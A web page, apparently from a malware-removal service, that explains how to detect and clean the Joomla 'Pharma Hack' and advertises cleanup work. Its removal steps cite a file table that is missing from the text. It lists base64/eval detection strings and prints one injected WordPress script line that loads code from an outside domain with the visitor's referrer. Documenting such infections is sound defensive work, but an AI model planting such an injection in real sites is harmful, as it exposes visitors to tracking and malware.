Installation

Obviously the site had been hacked. The hack was modifying the title tag and the site meta description so that the Google search results no longer showed what the site owner intended.

But the site had been hacked in a way that allowed the hack to show the normal page to human users and the hacked page to the Google search bot. This could indicate that it checked the User Agent setting of the visiting browser and only showed the hacked content if the User Agent was equal to “Googlebot”. But that was apparently not the only check. Even if a clever user like myself would use the User Agent Switcher add-on for Firefox and force the User Agent of the browser to be “Googlebot” the normal content would still show up.

So the hack must be using additional checks, most likely checking that the browser IP address matches well-known addresses used by Googlebot. Sneaky bastards.

How to detect the Pharma Hack

Luckily there is a foolproof way to determine how Googlebot sees your site, namely by using the Google Webmaster Tools. You will obviously have to create a Google account to use this but chances are that you have this already. Then you can activate the use of the Webmaster Tools and add your site to the Webmaster Tools homepage.

Once you have added the site you will need to verify that you are indeed the owner or at least a person who controls the website. I find that the easiest way is to use the “meta tag” option. Google will provide you with a custom meta tag that you need to insert in the main site template file.

With that out of the way you can start taking advantage of the Webmaster Tools. Select your site on the Webmaster Tools homepage. This will take you to the Dashboard for that site. You should now head straight to the “Diagnostics” menu item and select the “Fetch as Googlebot” submenu. Here you should just press the “Fetch” button next to the site URL editbox.

The page will now inform you that the request is in progress. You will need to update the page status manually so wait a few seconds and press F5. If the request has completed the status for the request should be “Success”. To view the result you must now press the “Success” link. Note that if you press the site URL link you will be taken to the site itself which is not what you want.

What you see now is the raw and unprocessed webpage. This may be a bit daunting if you are not a techie but not to worry – you only need to locate a few specific items. Scroll down a bit and try to locate a section that starts with the “title” tag (or use the browser search function to locate it). The line should look like this:

<title>A website title</title>

If the text between the and the tags matches the site title you have setup in the Joomla administration interface then all is good and your site is most likely not suffering from the Pharma Hack. But if you see anything else here (like, a suggestion to go buy a pharmaceutical product), then my friend, your site has been pwned.

Another thing to check is the site meta description. This will typically be listed close to the title tag and will look something like this:

<meta name="description" content="A longer site description" />

Again this text should match the site description you have setup in the Joomla administration interface. If not, then my friend, … (OK, you get the point by now).

How to remove the Pharma Hack

Once you have established that you are in fact suffering from the Pharma Hack you need to take steps to remove it.

First, you need to take a backup of your hacked site. I recommend that you use the Akeeba Backup component as this is probably the best and most stable solution for Joomla! sites available today (well, that’s my opinion anyway and I’m sticking to it. YMMV.). Once your backup has completed you should download it to your local PC.

Next, you need to change the password for the FTP account on your webhost. If you are too lazy to create and remember good strong passwords and you are also working on a Windows platform then I can heartily recommend the free and excellent KeePass 2 utility which enables you to generate and store individual passwords for all your sites in a central location, protected by a master password. It also offers auto-type options so that you don’t have to type in the long and cryptic passwords.

Once that has been dealt with you can proceed to cleanup your site. There are basically two ways to go about it, the hard but safe way and the slightly easier but less safe way.

The Hard Way

The Hard Way basically consist of deleting your whole site (files and databases all), installing a fresh site using the latest versions of Joomla! and any components. modules and plugins you may be using, and then re-loading your content from a backup.

I fully understand why you don’t want to go that route but it is important that you understand that this is the only method that will fully guarantee that you are getting rid of the hack.

The Easier Way

If the full rebuild is not an option you can try to get rid of the hack in a less radical way. Please note that I provide absolutely no guarantee that the following steps will work 100%. They may either have no effect or they may render your website inaccessible. You will assume all responsibilities for this yourself.

1. Set your site offline in the Joomla administrator interface.
2. Change the passwords of all your Joomla administrator accounts (see the comments for the KeePass 2 utility above).
3. Go seek out the files listed in the table below and perform the actions listed for each file. When editing a file is called for you may need to download the file to your local PC using FTP, edit the file using a text editor like Notepad (but not Microsoft Word) and upload the corrected file again.
4. Set your site online again.
5. Check your site using Google Webmaster tools again. If the infection has been successfully removed your site title and meta description should have reverted to the original values.

Additional things to check for

The files mentioned in the table above may not be the only infected files on your system. To perform a more thorough test you can extract the backup you created as the first step to a temporary directory. Then you can use a good text search utility like Agent Ransack to search the files for certain strings.

Hackers usually try to hide their code by encoding them using something called base64 encoding. This will translate an otherwise meaningful text into gibberish. An additional twist often used is to compress the encoded data to add another layer of obfuscation.

Some good strings to search for are (only use the parts inside the quote-signs):

• “eval(gzinflate(base64_decode(”
• “eval(base64_decode(”

The part after the “base64_decode(“ will typically consist of a long string of gibberish, like “’7b17VxtH8gD6N3tOvkMzq81IsRCSsLOOQNgYg41 …”. If you find any occurrences of such strings there’s a good chance that the containing file has been infected. The cure is either to remove the text line or delete the file completely.

How to avoid getting hacked again (or be able to live with the consequences)

The first order on the agenda is to always keep your Joomla site updated with the latest security fixes. Sign up to the Joomla! Security News on this page and receive emails whenever a new security patch has been released. I find that the easiest way to apply Joomla! patches to a remote Linux host is to use the Akeeba Kickstart utility. If you just copy the raw files using FTP from a Windows PC you risk screwing up the file permissions.

Secondly you need to have a viable backup strategy. Make a habit of making full site backups for instance using the Akeeba Backup component mentioned above. Akeeba also offers a Windows utility called Akeeba Remote Control that allows you to easily perform site backups from your Windows PC.

It is critical that the website is properly secured against reinfection as the malware is likely to return if the proper measures to secure the website are not taken. Please feel free to contact us to receive a free consultation on how to best deal with your malware infection. If you are not sure that your website is infected we would also be happy to confirm for you whether your website is in fact infected.

The most common type of infection places an iframe or JavaScript injection that creates an iframe in the website’s pages. The iframe accesses a web page on another website that attempts to infect the computer that is accessing the web page with malware. In some cases the hacker will obfuscate the JavaScript code to make it harder to discover. Other malware infection scripts are placed into .htaccess files to redirect visitors to a website that attempts to infect their computer with malware or to insert malware into the page that is served when a file that does not exist is requested. The malicious code can be can be hidden in a variety of places and might only be active when the website is accessed in a particular way. In some cases the malware infection attempt may only occur if a visitor comes to the website through Google or another search engine, if they come directly to the website the attempted malware infection will not occur. The hacker can also place a backdoor script that allows them remote access to the website to make future changes to it.

Once your website has been infected it can quickly be blocked from visitors. The website may be flagged and blocked in the Internet Explorer (“This website has been reported as unsafe”), Firefox (“Reported Attack Site!”), Safari (“Warning: Visiting this site may harm your computer”), Chrome (“Warning: Visiting this site may harm your computer!”), and Opera (“Fraud Warning”) web browsers. It may also be flagged and blocked in the Google (“This site may harm your computer.”, “This site may harm your device.”), Yahoo (“Warning: Hacking Risks”), and or Bing search engines as well as Google’s AdWords advertising service, Twitter (“unsafe link”).

To remove the malware, we will find the malicious code inserted during the hack and remove it. Removing the malware from the website can take a few hours. We can work on the website through FTP/SFTP, SSH, with access to your hosting providers interface. We will also work with you to determine how your website was hacked and take measures to secure the website against reinfection. If your website has been flagged and blocked, we will request a malware review from Google, Yahoo, and or Bing to have the warning removed. It should take no more than a day to be removed from Google’s malware blacklist after a review has been requested.

Recently Active Malware examples

WORDPRESS: echo’<script language=”javascript” SRC=”http://superpuperdomain2.com/count.php?ref=’.urlencode($_SERVER['HTTP_REFERER']) .’”></script>’;

Price:

Prepay for the service below or contact us with questions or descriptions to the trouble you may be experiencing.

A Drupal Implementation

Butler Sales and Service

A WordPress implementation with e-commerce capable and de-activated fro catalog appearance